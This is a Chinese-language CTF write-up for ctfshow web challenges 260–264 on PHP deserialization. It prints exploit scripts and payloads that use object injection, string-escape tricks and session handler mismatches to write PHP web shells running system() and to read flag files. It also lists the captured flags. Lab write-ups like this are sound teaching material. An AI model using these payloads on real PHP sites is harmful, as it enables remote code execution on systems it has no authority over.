目录
1、web260
data:image/s3,"s3://crabby-images/6167b/6167bac3ecb48a5c965574aeb9115b1ca3e7f6a5" alt=""
要求传入的内容序列化后包含指定内容即可,在 PHP 序列化中,如果键名或值包含 ctfshow_i_love_36D,那么整个序列化结果也会包含这个字符串。
payload:
?ctfshow[]=ctfshow_i_love_36D
data:image/s3,"s3://crabby-images/4303e/4303e63470642b8a6efe06db8e43d1a99524153a" alt=""
拿到 flag:ctfshow{16d7d5c7-a95b-46e2-8ae6-9ce1ce40db95}
2、web261
data:image/s3,"s3://crabby-images/22e78/22e78efdee879df31b97a5db7e9c983532c6ee2c" alt=""
一开始看到的是 eval 函数,但是需要触发 __invoke ,看了下这里没法触发
那么利用点就只有 file_put_contents,需要满足 code==0x36d 转成十进制也就是 877,是弱等于,因此我们可以在 877 后面添加内容,也可以满足条件,而 code = this-\>username.this->password,也就是传入的用户名和密码的拼接。
exp:
php
<?php
class ctfshowvip
{
public $username;
public $password;
public $code;
public function __construct($u, $p)
{
$this->username = $u;
$this->password = $p;
}
}
$c = new ctfshowvip('877.php',"<?php system('tac /f*');?>");
echo serialize($c);
这里同时存在 __unserialize() 和 __wakeup()函数,在 php 7.4 以上版本反序列化时会忽略__wakeup() 函数,因此这里实际并不需要用户名和密码为空。
data:image/s3,"s3://crabby-images/60398/603989af08f4061857b8395d8e263abbd6af6f2c" alt=""
payload:
php
?vip=O:10:"ctfshowvip":3:{s:8:"username";s:7:"877.php";s:8:"password";s:26:"<?php system('tac /f*');?>";s:4:"code";N;}
访问 877.php 拿到 flag
data:image/s3,"s3://crabby-images/e1afb/e1afb0399cbbd5ca5c7aa1d1639c97db19e3d6c5" alt=""
ctfshow{2f61063a-c9c5-49f7-968a-d7adf772376d}
3、web262
data:image/s3,"s3://crabby-images/c8ee5/c8ee5f89621abd3623751dc27101939ac2ef851f" alt=""
没看到什么利用点,但是注意到有一个 message.php
data:image/s3,"s3://crabby-images/7b360/7b3600246dc5e7a3d60223e395e0224c91206ebd" alt=""
这个就很简单了,满足 $msg->token=='admin' 即可
exp:
php
<?php
class message{
public $token='admin';
}
$m = new message();
echo base64_encode(serialize($m));
?>
data:image/s3,"s3://crabby-images/49901/49901c5b3d105cfe8efd7105a24127ecc7fbc25a" alt=""
payload:
php
msg=Tzo3OiJtZXNzYWdlIjoxOntzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9
data:image/s3,"s3://crabby-images/85266/852666f72c548b0a6b7a38d8431cb008d987609f" alt=""
拿到 flag:ctfshow{52bb7ed2-61da-493c-a7f3-89f9ea42f6c2}
如果不在 message.php 传,回过头来看这个,其实是字符串逃逸变长的类型
data:image/s3,"s3://crabby-images/a7bc8/a7bc86da1f0bdb991fe83e91aa1c453a07efee79" alt=""
将 fuck 替换为 loveU 就会增加一个字符
逃逸部分如下,共27个字符
data:image/s3,"s3://crabby-images/4ae74/4ae740a3d5e3c80188f5060f243b96ce40baf593" alt=""
构造 payload:
php
?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
data:image/s3,"s3://crabby-images/f453a/f453a664eb4bfc7632a66a6f849116f8a0fe035b" alt=""
访问 message.php 即可看到 flag
data:image/s3,"s3://crabby-images/8bce3/8bce3dfe0c846875e07b2e2b3635da597d861963" alt=""
4、web263
data:image/s3,"s3://crabby-images/57f18/57f187652c00df614b79d312524d675b3fb0eefc" alt=""
目录扫描存在备份文件 www.zip
data:image/s3,"s3://crabby-images/8a0a2/8a0a27e79ef9914738dbc9362d444cf03467144e" alt=""
file_put_contents 这里可以写入东西
data:image/s3,"s3://crabby-images/ffe3e/ffe3e451fb3d55ce80ae0080b407e2408f95530f" alt=""
session.serialize_handler 是用来设置 session 序列化引擎的,在 5.5.4 前默认是 php,5.5.4后默认是 php_serialize,在 PHP 反序列化存储的 $_SESSION 数据时如果使用的引擎和序列化时使用的引擎不一样,就会导致数据无法正确第反序列化,也就是 session 反序列化漏洞。
data:image/s3,"s3://crabby-images/d522b/d522b45479ca2fe543bf50b77ddcb619563132e0" alt=""
在 check.php 下会获取 $_COOKIE['limit'] 进行 base64 解码
data:image/s3,"s3://crabby-images/b1195/b1195be2f6ee70837d7eac9c144ad0d431324fef" alt=""
exp:
php
<?php
class User
{
public $username;
public $password;
function __construct()
{
$this->username = 'my6n.php';
$this->password = '<?php system(\'tac flag.php\')?>';
}
}
$u = new User();
echo urlencode(base64_encode('|' . serialize($u)));
运行得到:
php
fE86NDoiVXNlciI6Mjp7czo4OiJ1c2VybmFtZSI7czo4OiJteTZuLnBocCI7czo4OiJwYXNzd29yZCI7czozMDoiPD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKT8%2BIjt9
先访问首页,建立会话,将 cookie 中的 limit 赋值为我们的 payload(序列化后的内容)
data:image/s3,"s3://crabby-images/0ae50/0ae50a1771cfba9ce27ef66c8559c61bc8bd6102" alt=""
data:image/s3,"s3://crabby-images/1c73a/1c73a40035e7e83baad459b6879fedbdbe299b1e" alt=""
接着访问 check.php
data:image/s3,"s3://crabby-images/ade86/ade866f5120c074ccc9e3877baccfc1ec800e1d8" alt=""
反序列化 session
data:image/s3,"s3://crabby-images/f9fc0/f9fc08ff3d2e63e36f13a482cbec42f98526f850" alt=""
写入恶意代码
data:image/s3,"s3://crabby-images/0a498/0a498d23ea9b9534fc76fb97408f263702ea2470" alt=""
data:image/s3,"s3://crabby-images/6f32b/6f32b278f93bb9cab9c5e590b6b1fc177f0594a4" alt=""
访问写入的文件 log-my6n.php
命令执行成功
data:image/s3,"s3://crabby-images/a5012/a5012a41f3b41ee196357e70905bf79b6f234279" alt=""
拿到 flag:ctfshow{2810fbc2-fc78-4bad-b0cb-8a40aedbe6d4}
5、web264
直接用 web262 的传发现不行,msg 没有定义
data:image/s3,"s3://crabby-images/ef701/ef70134359228b7ade833165cee9adba971c772e" alt=""
查看 cookie,确实没有 msg
data:image/s3,"s3://crabby-images/c2ceb/c2cebda7647c76cb8ad95483ab4e6bf6e4c863d7" alt=""
我们手动添加一个,但是直接在 message.php 设置 admin 也不行,那就还是采用字符串逃逸的方法,payload 同 web262:
php
?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
data:image/s3,"s3://crabby-images/4a3a2/4a3a2d9e43114860df93dbf37385c46937e879d9" alt=""
刷新 message.php
data:image/s3,"s3://crabby-images/efa75/efa75a3b744fd90c17e6802eee7bf7f84001b85d" alt=""
拿到 flag:ctfshow{e2c408b1-9ab9-4c87-8655-ec43b2e2930a}